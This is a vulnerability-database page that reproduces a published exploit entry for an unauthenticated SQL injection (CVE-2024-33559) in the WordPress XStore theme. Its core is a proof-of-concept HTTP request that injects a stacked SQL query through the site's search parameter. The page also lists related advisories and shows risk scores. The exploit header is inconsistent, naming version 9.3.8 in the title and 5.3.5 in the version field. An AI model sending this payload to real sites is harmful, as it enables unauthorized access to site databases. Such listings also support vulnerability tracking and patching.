Vulners
Lucene search
WordPress XStore Theme 9.3.8 SQL Injection
🗓️ 20 May 2024 00:00:00Reported by Abdualhadi KhalifaType 
packetstorm🔗 packetstormsecurity.com👁 331 Views
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
 | Wordpress Theme XStore 9.3.8 - SQL injection Vulnerability | 19 May 202400:00 | – | zdt |
 | CVE-2024-33559 | 24 May 202403:20 | – | circl |
 | WordPress plugin XStore Core SQL注入漏洞 | 29 Apr 202400:00 | – | cnnvd |
 | CVE-2024-33559 | 29 Apr 202406:04 | – | cve |
 | CVE-2024-33559 WordPress XStore theme <= 9.3.5 - Unauthenticated SQL Injection vulnerability | 29 Apr 202406:04 | – | cvelist |
 | Wordpress Theme XStore 9.3.8 - SQLi | 19 May 202400:00 | – | exploitdb |
 | EUVD-2024-31296 | 3 Oct 202520:07 | – | euvd |
 | WordPress XStore Theme - SQL Injection | 27 May 202521:29 | – | nuclei |
 | CVE-2024-33559 | 29 Apr 202406:15 | – | nvd |
 | WordPress XStore theme <= 9.3.8 - Unauthenticated SQL Injection vulnerability | 25 Apr 202413:05 | – | patchstack |
10
`# Exploit Title: Wordpress Theme XStore 9.3.8 - SQLi
# Google Dork: N/A
# Date: 2024-05-16
# Exploit Author: [Abdualhadi khalifa (https://twitter.com/absholi_ly)
# Version: 5.3.5
# Tested on: Windows10
# CVE: CVE-2024-33559
Poc
<https://github.com/absholi7ly/WordPress-XStore-theme-SQL-Injection#poc>
POST /?s=%27%3B+SELECT+*+FROM+wp_posts%3B+-- HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Upgrade-Insecure-Requests: 1
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 May 2024 00:00Current
7.1High risk
Vulners AI Score7.1
EPSS0.06716